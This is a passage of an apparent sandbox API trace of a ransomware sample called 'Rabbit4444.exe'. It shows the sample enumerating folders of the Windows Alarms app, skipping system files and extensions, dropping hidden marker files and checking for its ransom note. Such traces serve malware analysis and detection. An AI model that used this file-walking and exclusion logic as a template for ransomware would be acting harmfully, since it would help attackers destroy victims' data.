ftLastWriteTime.dwHighDateTime=0x1d32735, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0064.451] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0064.451] lstrcpyW (in: lpString1=0x130ebe4, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0064.451] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0064.453] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0064.453] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0064.454] lstrlenW (lpString="Rabbit4444") returned 10 [0064.454] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0064.454] lstrlenW (lpString=".dll") returned 4 [0064.454] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0064.454] lstrlenW (lpString=".lnk") returned 4 [0064.454] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0064.454] lstrlenW (lpString=".ini") returned 4 [0064.454] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0064.454] lstrlenW (lpString=".sys") returned 4 [0064.454] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0064.454] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ba1734c, ftCreationTime.dwHighDateTime=0x1d32735, ftLastAccessTime.dwLowDateTime=0x7ba1734c, ftLastAccessTime.dwHighDateTime=0x1d32735, ftLastWriteTime.dwLowDateTime=0x7ba1734c, ftLastWriteTime.dwHighDateTime=0x1d32735, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0064.454] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0064.454] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.454] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.454] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.454] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.455] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.456] CloseHandle (hObject=0x2a0) returned 1 [0064.456] CloseHandle (hObject=0x2cc) returned 1 [0064.456] GetCurrentThreadId () returned 0xd98 [0064.456] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0064.456] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState" [0064.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122e40 | out: hHeap=0xe0000) returned 1 [0064.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0064.456] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState" [0064.456] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\" [0064.456] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0064.456] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.457] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.460] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.460] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.461] CloseHandle (hObject=0x2cc) returned 1 [0064.461] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState") returned 89 [0064.461] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.461] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1649d0c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefbd6f3c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0064.461] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.461] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.461] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.461] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.461] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1649d0c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefbd6f3c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.461] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.461] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.462] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.462] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.462] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.462] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefbd6f3c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefbd6f3c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefbd6f3c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.462] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.462] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.462] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefbd6f3c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefbd6f3c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefbd6f3c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.462] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0064.462] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.462] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.463] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.463] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.463] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.463] CloseHandle (hObject=0x2a0) returned 1 [0064.463] CloseHandle (hObject=0x2cc) returned 1 [0064.463] GetCurrentThreadId () returned 0xd98 [0064.463] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0064.463] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState" [0064.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124530 | out: hHeap=0xe0000) returned 1 [0064.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0064.464] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState" [0064.464] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\" [0064.464] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0064.464] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.469] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.471] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.472] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.472] CloseHandle (hObject=0x2cc) returned 1 [0064.472] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState") returned 87 [0064.473] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.473] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbe9a3b7f, ftLastAccessTime.dwHighDateTime=0x1d32746, ftLastWriteTime.dwLowDateTime=0xefbfd13e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0064.473] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.473] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.473] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.473] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.473] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbe9a3b7f, ftLastAccessTime.dwHighDateTime=0x1d32746, ftLastWriteTime.dwLowDateTime=0xefbfd13e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.473] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.473] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.473] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.473] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.473] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.473] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefbfd13e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefbfd13e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefbfd13e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.473] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.473] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.473] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8bec4c, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0x6cd1c887, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x6cd1c887, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Alarms", cAlternateFileName="")) returned 1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2="Rabbit4444.exe") returned -1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2=".") returned 1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2="..") returned 1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2="windows") returned -1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2="bootmgr") returned -1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2="pagefile.sys") returned -1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2="boot") returned -1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2="ids.txt") returned -1 [0064.473] lstrcmpiW (lpString1="Alarms", lpString2="NTUSER.DAT") returned -1 [0064.473] lstrcpyW (in: lpString1=0x130ebe8, lpString2="Alarms" | out: lpString1="Alarms") returned="Alarms" [0064.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0064.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0xefb28 [0064.474] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122348 | out: ListHead=0xf68b0, ListEntry=0x122348) returned 0x122328 [0064.474] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9a3b7f, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0xbe9a3b7f, ftLastAccessTime.dwHighDateTime=0x1d32746, ftLastWriteTime.dwLowDateTime=0xbe9c9cef, ftLastWriteTime.dwHighDateTime=0x1d32746, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Clocks", cAlternateFileName="")) returned 1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2="Rabbit4444.exe") returned -1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2=".") returned 1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2="..") returned 1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2="windows") returned -1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2="bootmgr") returned 1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2="pagefile.sys") returned -1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2="boot") returned 1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2="ids.txt") returned -1 [0064.474] lstrcmpiW (lpString1="Clocks", lpString2="NTUSER.DAT") returned -1 [0064.474] lstrcpyW (in: lpString1=0x130ebe8, lpString2="Clocks" | out: lpString1="Clocks") returned="Clocks" [0064.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0064.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x11e0b0 [0064.474] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122348 [0064.474] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9a3b7f, ftCreationTime.dwHighDateTime=0x1d32746, ftLastAccessTime.dwLowDateTime=0xbe9a3b7f, ftLastAccessTime.dwHighDateTime=0x1d32746, ftLastWriteTime.dwLowDateTime=0xbe9c9cef, ftLastWriteTime.dwHighDateTime=0x1d32746, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Clocks", cAlternateFileName="")) returned 0 [0064.474] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0064.474] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.474] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.477] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.477] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.478] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.478] CloseHandle (hObject=0x2a0) returned 1 [0064.478] CloseHandle (hObject=0x2cc) returned 1 [0064.478] GetCurrentThreadId () returned 0xd98 [0064.478] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0064.478] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks" [0064.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0b0 | out: hHeap=0xe0000) returned 1 [0064.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0064.478] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks" [0064.478] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks\\" [0064.478] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks\\.BFC0E91B00AE8A0620D3" [0064.478] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalState\\Clocks\\.BFC0E91B00AE8A0620D3" (normalized: 